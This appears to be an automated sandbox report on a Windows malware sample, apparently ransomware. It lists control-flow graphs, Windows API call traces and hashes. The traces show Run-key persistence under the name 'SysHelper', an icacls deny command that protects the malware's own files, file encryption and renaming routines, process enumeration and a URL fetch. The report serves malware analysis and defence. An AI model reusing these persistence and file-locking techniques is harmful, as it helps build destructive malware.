2124->2116 2136 e2fffb-e3000b 2124->2136 2125->2116 2139 e2ffd0-e2ffd5 2125->2139 2141 e2ff97 2134->2141 2135->2109 2140 e2ff91 2135->2140 2137 e3000f-e30026 call e41c02 2136->2137 2138 e3000d 2136->2138 2137->2116 2145 e30028-e30035 call e311c0 2137->2145 2138->2137 2139->2110 2143 e2ffd7 2139->2143 2140->2141 2141->2101 2143->2105 2145->2116
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 3232302685-0
                                                                                                  • Opcode ID: 90333470709364d533c1daa48089aa8df254af2b87ca10bd21adcf5c170ad286
                                                                                                  • Instruction ID: 5b2443da432aba32a24c18d2223c7a38c787a4edf6d4d34e38182d0e506a79aa
                                                                                                  • Opcode Fuzzy Hash: 90333470709364d533c1daa48089aa8df254af2b87ca10bd21adcf5c170ad286
                                                                                                  • Instruction Fuzzy Hash: 4FB17970D00218DADF24DFA4E889BDEBBB5BF14308F5050B9E409BB251EB359A45CF56
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 985 e31cd0-e31d1a call e4f7c0 RegOpenKeyExW 988 e31d20-e31d8d call e4b420 RegQueryValueExW RegCloseKey 985->988 989 e32207-e32216 985->989 992 e31d93-e31d9c 988->992 993 e31d8f-e31d91 988->993 995 e31da0-e31da9 992->995 994 e31daf-e31dcb call e35c10 993->994 999 e31dd1-e31df8 lstrlenA call e33520 994->999 1000 e31e7c-e31e87 994->1000 995->995 996 e31dab-e31dad 995->996 996->994 1006 e31dfa-e31dfe 999->1006 1007 e31e28-e31e2c 999->1007 1002 e31e94-e31f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 1000->1002 1003 e31e89-e31e91 call e42587 1000->1003 1014 e31f36-e31f38 1002->1014 1015 e31f3a-e31f3f 1002->1015 1003->1002 1010 e31e00-e31e08 call e42587 1006->1010 1011 e31e0b-e31e23 call e345a0 1006->1011 1012 e31e2e-e31e39 call e42587 1007->1012 1013 e31e3c-e31e50 PathFileExistsW 1007->1013 1010->1011 1011->1007 1012->1013 1013->1000 1021 e31e52-e31e57 1013->1021 1019 e31f4f-e31f96 call e35c10 RpcStringFreeW PathAppendW CreateDirectoryW 1014->1019 1020 e31f40-e31f49 1015->1020 1032 e31f98-e31fa0 1019->1032 1033 e31fce-e31fe9 1019->1033 1020->1020 1025 e31f4b-e31f4d 1020->1025 1026 e31e6a-e31e6e 1021->1026 1027 e31e59-e31e5e 1021->1027 1025->1019 1026->989 1030 e31e74-e31e77 1026->1030 1027->1026 1028 e31e60-e31e65 call e34690 1027->1028 1028->1026 1034 e321ff-e32204 call e42587 1030->1034 1035 e31fa2-e31fa4 1032->1035 1036 e31fa6-e31faf 1032->1036 1038 e31feb-e31fed 1033->1038 1039 e31fef-e31ff8 1033->1039 1034->989 1040 e31fbf-e31fc9 call e35c10 1035->1040 1042 e31fb0-e31fb9 1036->1042 1043 e3200f-e32076 call e35c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 1038->1043 1044 e32000-e32009 1039->1044 1040->1033 1042->1042 1045 e31fbb-e31fbd 1042->1045 1050 e321d1-e321d5 1043->1050 1051 e3207c-e32107 call e4b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 1043->1051 1044->1044 1047 e3200b-e3200d 1044->1047 1045->1040 1047->1043 1053 e321e2-e321fa 1050->1053 1054 e321d7-e321df call e42587 1050->1054 1058 e32115-e321a8 call e4b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 1051->1058 1059 e32109-e32110 call e33260 1051->1059 1053->989 1055 e321fc 1053->1055 1054->1053 1055->1034 1064 e321b2-e321b8 1058->1064 1065 e321aa-e321b0 GetLastError 1058->1065 1059->1058 1066 e321c0-e321cf WaitForSingleObject 1064->1066 1065->1050 1066->1050 1066->1066
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,00EEAC68,000000FF), ref: 00E31D12
                                                                                                  • _memset.LIBCMT ref: 00E31D3B
                                                                                                  • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00E31D63
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EEAC68,000000FF), ref: 00E31D6C
                                                                                                  • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00E31DD6
                                                                                                  • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00E31E48
                                                                                                  • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00E31E99
                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00E31EA5
                                                                                                  • GetCommandLineW.KERNEL32 ref: 00E31EB4
                                                                                                  • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00E31EBF
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 00E31ECE
                                                                                                  • PathFindFileNameW.SHLWAPI(?), ref: 00E31EDB
                                                                                                  • UuidCreate.RPCRT4(?), ref: 00E31EFC
                                                                                                  • UuidToStringW.RPCRT4(?,?), ref: 00E31F14
                                                                                                  • RpcStringFreeW.RPCRT4(00000000), ref: 00E31F64
                                                                                                  • PathAppendW.SHLWAPI(?,?), ref: 00E31F83
                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E31F8E
                                                                                                  • PathAppendW.SHLWAPI(?,?,?,?), ref: 00E3202D
                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00E32036
                                                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 00E3204C
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00E3206E
                                                                                                  • _memset.LIBCMT ref: 00E32090
                                                                                                  • lstrcpyW.KERNEL32(?,00F202FC), ref: 00E320AA
                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 00E320C0
                                                                                                  • lstrcatW.KERNEL32(?," --AutoStart), ref: 00E320CE
                                                                                                  • lstrlenW.KERNEL32(?), ref: 00E320D7
                                                                                                  • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 00E320F3
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E320FC
                                                                                                  • _memset.LIBCMT ref: 00E32120
                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00E32146
                                                                                                  • lstrcpyW.KERNEL32(?,icacls "), ref: 00E32158
                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 00E3216D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                  • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                  • API String ID: 2589766509-1182136429
                                                                                                  • Opcode ID: d696769fc51a2b9fc85e5ae27d7e5042a2f1990c3d5796f259b9703df40836f4
                                                                                                  • Instruction ID: 14a863782bbe2acbf0a9d482ab3e5de66d15a6bf6bbb88b16cb470ad92e6f85f
                                                                                                  • Opcode Fuzzy Hash: d696769fc51a2b9fc85e5ae27d7e5042a2f1990c3d5796f259b9703df40836f4
                                                                                                  • Instruction Fuzzy Hash: 63E16D71D0025DABDF24DBA0DD49BEEBBB8BF04304F1050A9F605B6191EB75AA89CF50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1067 e311c0-e3121d CreateFileW 1068 e31223-e31232 GetFileSizeEx 1067->1068 1069 e318eb-e318fb 1067->1069 1070 e312a3-e312be VirtualAlloc 1068->1070 1071 e31234 1068->1071 1074 e312c0-e312d5 call e4b420 1070->1074 1075 e3131a-e31331 CloseHandle 1070->1075 1072 e31236-e3123a 1071->1072 1073 e3123c-e31281 CloseHandle call e33100 call e359d0 MoveFileW 1071->1073 1072->1070 1072->1073 1073->1069 1091 e31287-e312a2 call e42587 1073->1091 1081 e313b1 1074->1081 1082 e312db-e312de 1074->1082 1083 e313b7-e313ef SetFilePointer 1081->1083 1085 e312e0-e312e3 1082->1085 1086 e312e9-e3130a SetFilePointerEx 1082->1086 1089 e313f5-e3140d ReadFile 1083->1089 1090 e315bf 1083->1090 1085->1081 1085->1086 1087 e31332-e3134d ReadFile 1086->1087 1088 e3130c-e31314 VirtualFree 1086->1088 1087->1088 1092 e3134f-e31354 1087->1092 1088->1075 1093 e31440-e31445 1089->1093 1094 e3140f-e3143f VirtualFree CloseHandle call e32d50 1089->1094 1095 e315c5-e315d9 SetFilePointerEx 1090->1095 1092->1088 1097 e31356-e31359 1092->1097 1093->1090 1099 e3144b-e3146b 1093->1099 1095->1094 1100 e315df-e315eb 1095->1100 1097->1083 1102 e3135b-e31377 call e32c40 call e37060 1097->1102 1104 e31471-e315a8 lstrlenA call e40be4 lstrlenA call e4d8d0 lstrlenA call e2eaa0 call e42110 call e2c5c0 call e32d10 call e32d50 call e2bbd0 call e2bd50 call e33ff0 call e32f70 call e2c070 SetFilePointer 1099->1104 1105 e31718-e317d9 lstrlenA call e40be4 lstrlenA call e4d8d0 lstrlenA call e2eaa0 call e42110 call e2bbd0 call e2bd50 call e32f70 call e2c070 1099->1105 1106 e3160e-e31643 call e330b0 call e32840 1100->1106 1107 e315ed-e315fc WriteFile 1100->1107 1130 e313a7-e313af call e32d50 1102->1130 1131 e31379-e313a6 VirtualFree CloseHandle call e32d50 1102->1131 1182 e317e1-e3182e call e32d50 call e32c40 call e32bf0 call e2cba0 1104->1182 1195 e315ae-e315ba call e32d50 * 2 1104->1195 1105->1182 1127 e31647-e3165a WriteFile call e32d50 1106->1127 1128 e31645 1106->1128 1107->1094 1111 e31602-e3160b call e42110 1107->1111 1111->1106 1127->1094 1144 e31660-e31680 lstrlenA WriteFile 1127->1144 1128->1127 1130->1083 1144->1094 1147 e31686-e316de CloseHandle call e33100 call e359d0 MoveFileW 1144->1147 1162 e318a7-e318d3 call e33210 call e32d50 1147->1162 1163 e316e4-e31717 VirtualFree call e33210 call e32d50 1147->1163 1184 e318e3-e318e6 1162->1184 1185 e318d5-e318dd VirtualFree 1162->1185 1203 e31830-e31832 1182->1203 1204 e3186e-e318a6 VirtualFree CloseHandle call e32d50 * 2 1182->1204 1184->1069 1186 e318e8-e318e9 CloseHandle 1184->1186 1185->1184 1186->1069 1195->1090 1203->1204 1206 e31834-e3185b WriteFile 1203->1206 1206->1204 1207 e3185d-e31869 call e32d50 1206->1207 1207->1095
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 00E3120F
                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00E31228
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00E3123D
                                                                                                  • MoveFileW.KERNEL32(00000000,?), ref: 00E31277
                                                                                                  • VirtualAlloc.KERNEL32(00000000,00025815,00001000,00000004,?,00000000,?), ref: 00E312B1
                                                                                                  • _memset.LIBCMT ref: 00E312C8
                                                                                                  • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00E31301
                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00E31314
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00E3131B
                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000026,?,00000000,?,00000000,?), ref: 00E31349
                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00000000,?), ref: 00E31381
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00E31388
                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 00E313E6
                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00025805,?,00000000,?,00000000,?), ref: 00E31409
                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00E31417
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00E3141E
                                                                                                  • lstrlenA.KERNEL32(?,?,00000000,?), ref: 00E31471
                                                                                                  • lstrlenA.KERNEL32(?,?,?,00000000,?), ref: 00E31491
                                                                                                  • lstrlenA.KERNEL32(?,00000000,?,?,?,?,?,00000000,?), ref: 00E314CF
                                                                                                  • SetFilePointer.KERNEL32(00000000,00000005,00000000,00000000,00000005,00000000,-000000FB,-000000FB,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 00E3159D
                                                                                                  • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00E315D0
                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00E315F8
                                                                                                  • WriteFile.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00E31649
                                                                                                  • lstrlenA.KERNEL32({36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E3166B
                                                                                                  • WriteFile.KERNEL32(00000000,{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E31678
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00E3168D
                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00E316D6
                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E316EB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseHandleVirtual$FreePointerlstrlen$Write$MoveRead$AllocCreateSize_memset
                                                                                                  • String ID: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                  • API String ID: 254274740-1186676987
                                                                                                  • Opcode ID: 83389f62baae1ed52e0dd8cd8c3e357c05aa568fff65ea242090355e549fa4ab
                                                                                                  • Instruction ID: b29147ced53232cc894f03cb31bd1569fb381aa83849b87046c3456503a19412
                                                                                                  • Opcode Fuzzy Hash: 83389f62baae1ed52e0dd8cd8c3e357c05aa568fff65ea242090355e549fa4ab
                                                                                                  • Instruction Fuzzy Hash: 8522AE70D00248EFEB14DBA4EC89BEEBBB8EF05304F6041A9F515B7291DB745A49CB61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1213 e32220-e3228a call e4f7c0 GetCommandLineW CommandLineToArgvW PathFindFileNameW LoadLibraryW GetProcAddress * 3 1216 e322bd-e322d1 K32EnumProcesses 1213->1216 1217 e3228c-e322ba LoadLibraryW GetProcAddress * 3 1213->1217 1218 e322d3-e322de 1216->1218 1219 e322df-e322ec 1216->1219 1217->1216 1220 e32353-e3235b 1219->1220 1221 e322ee 1219->1221 1222 e322f0-e32308 OpenProcess 1221->1222 1223 e32346-e32351 CloseHandle 1222->1223 1224 e3230a-e3231a K32EnumProcessModules 1222->1224 1223->1220 1223->1222 1224->1223 1225 e3231c-e32339 K32GetModuleBaseNameW call e40235 1224->1225 1227 e3233e-e32343 1225->1227 1227->1223 1228 e32345 1227->1228 1228->1223
                                                                                                  APIs
                                                                                                  • GetCommandLineW.KERNEL32 ref: 00E32235
                                                                                                  • CommandLineToArgvW.SHELL32(00000000,?), ref: 00E32240
                                                                                                  • PathFindFileNameW.SHLWAPI(00000000), ref: 00E32248
                                                                                                  • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00E32256
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00E3226A
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00E32275
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00E32280
                                                                                                  • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00E32291
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00E3229F
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00E322AA
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00E322B5
                                                                                                  • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 00E322CD
                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00E322FE
                                                                                                  • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00E32315
                                                                                                  • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 00E3232C
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00E32347
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                  • API String ID: 3668891214-3807497772
                                                                                                  • Opcode ID: 207f365432932908a2ce142ae336d70d8cd720243942acbe3f3c714abc21897c
                                                                                                  • Instruction ID: c94176bc9168410b8bedb2909b05698f70a62bfc5f7bec80cbbe59f7860374f5
                                                                                                  • Opcode Fuzzy Hash: 207f365432932908a2ce142ae336d70d8cd720243942acbe3f3c714abc21897c
                                                                                                  • Instruction Fuzzy Hash: 77316271E0121DAFDB10DFA59C49EAEBBB8EF49704F104069F604F6150DA74DE05DB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • timeGetTime.WINMM ref: 00E3F15E
                                                                                                  • Sleep.KERNEL32(?), ref: 00E3F185
                                                                                                  • Sleep.KERNEL32(?), ref: 00E3F19D
                                                                                                  • SendMessageW.USER32(?,00008003,00000000,00000000), ref: 00E3F9D0
                                                                                                    • Part of subcall function 00E30A50: GetLogicalDrives.KERNEL32 ref: 00E30A75
                                                                                                    • Part of subcall function 00E30A50: SetErrorMode.KERNEL32(00000001,00F20234,00000002), ref: 00E30AE2
                                                                                                    • Part of subcall function 00E30A50: PathFileExistsA.SHLWAPI(?), ref: 00E30AF9
                                                                                                    • Part of subcall function 00E30A50: SetErrorMode.KERNEL32(00000000), ref: 00E30B02
                                                                                                    • Part of subcall function 00E30A50: GetDriveTypeA.KERNEL32(?), ref: 00E30B1B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorModeSleep$DriveDrivesExistsFileLogicalMessagePathSendTimeTypetime
                                                                                                  • String ID: C:\
                                                                                                  • API String ID: 3672571082-3404278061
                                                                                                  • Opcode ID: a4e8275cf85b8c09f9dc86836dbc4f7dbde13fbc4f20d161a673dd18f41ffdab
                                                                                                  • Instruction ID: 56b040562a7f5c8c0d46d4fa8abe8a54a57866dce98f224e67beb8bd03051fbc
                                                                                                  • Opcode Fuzzy Hash: a4e8275cf85b8c09f9dc86836dbc4f7dbde13fbc4f20d161a673dd18f41ffdab
                                                                                                  • Instruction Fuzzy Hash: AD429DB1D003159BDF24DFA8D889BAEBBF1BF44308F245129E805BB281D775AA05CBD1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1829 e2cf10-e2cfb0 call e4f7c0 call e4b420 InternetOpenW call e35c10 InternetOpenUrlW 1836 e2cfb2-e2cfb4 1829->1836 1837 e2cfb9-e2cffb InternetReadFile InternetCloseHandle * 2 call e356d0 1829->1837 1838 e2d213-e2d217 1836->1838 1842 e2d000-e2d01d 1837->1842 1840 e2d224-e2d236 1838->1840 1841 e2d219-e2d221 call e42587 1838->1841 1841->1840 1844 e2d023-e2d02c 1842->1844 1845 e2d01f-e2d021 1842->1845 1848 e2d030-e2d035 1844->1848 1847 e2d039-e2d069 call e356d0 call e34300 1845->1847 1854 e2d1cb 1847->1854 1855 e2d06f-e2d08b call e33010 1847->1855 1848->1848 1849 e2d037 1848->1849 1849->1847 1857 e2d1cd-e2d1d1 1854->1857 1863 e2d0b9-e2d0bd 1855->1863 1864 e2d08d-e2d091 1855->1864 1859 e2d1d3-e2d1db call e42587 1857->1859 1860 e2d1de-e2d1f4 1857->1860 1859->1860 1861 e2d201-e2d20f 1860->1861 1862 e2d1f6-e2d1fe call e42587 1860->1862 1861->1838 1862->1861 1866 e2d0bf-e2d0ca call e42587 1863->1866 1867 e2d0cd-e2d0e1 call e34300 1863->1867 1869 e2d093-e2d09b call e42587 1864->1869 1870 e2d09e-e2d0b4 call e33d40 1864->1870 1866->1867 1867->1854 1880 e2d0e7-e2d149 call e33010 1867->1880 1869->1870 1870->1863 1883 e2d150-e2d15a 1880->1883 1884 e2d160-e2d162 1883->1884 1885 e2d15c-e2d15e 1883->1885 1887 e2d165-e2d16a 1884->1887 1886 e2d16e-e2d18b call e2b650 1885->1886 1891 e2d19a-e2d19e 1886->1891 1892 e2d18d-e2d18f 1886->1892 1887->1887 1888 e2d16c 1887->1888 1888->1886 1891->1883 1894 e2d1a0 1891->1894 1892->1891 1893 e2d191-e2d198 1892->1893 1893->1891 1895 e2d1c7-e2d1c9 1893->1895 1896 e2d1a2-e2d1a6 1894->1896 1895->1896 1897 e2d1b3-e2d1c5 1896->1897 1898 e2d1a8-e2d1b0 call e42587 1896->1898 1897->1857 1898->1897
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 00E2CF4A
                                                                                                  • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00E2CF5F
                                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00E2CFA6
                                                                                                  • InternetReadFile.WININET(00000000,?,00002800,?), ref: 00E2CFCD
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00E2CFDA
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00E2CFDD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
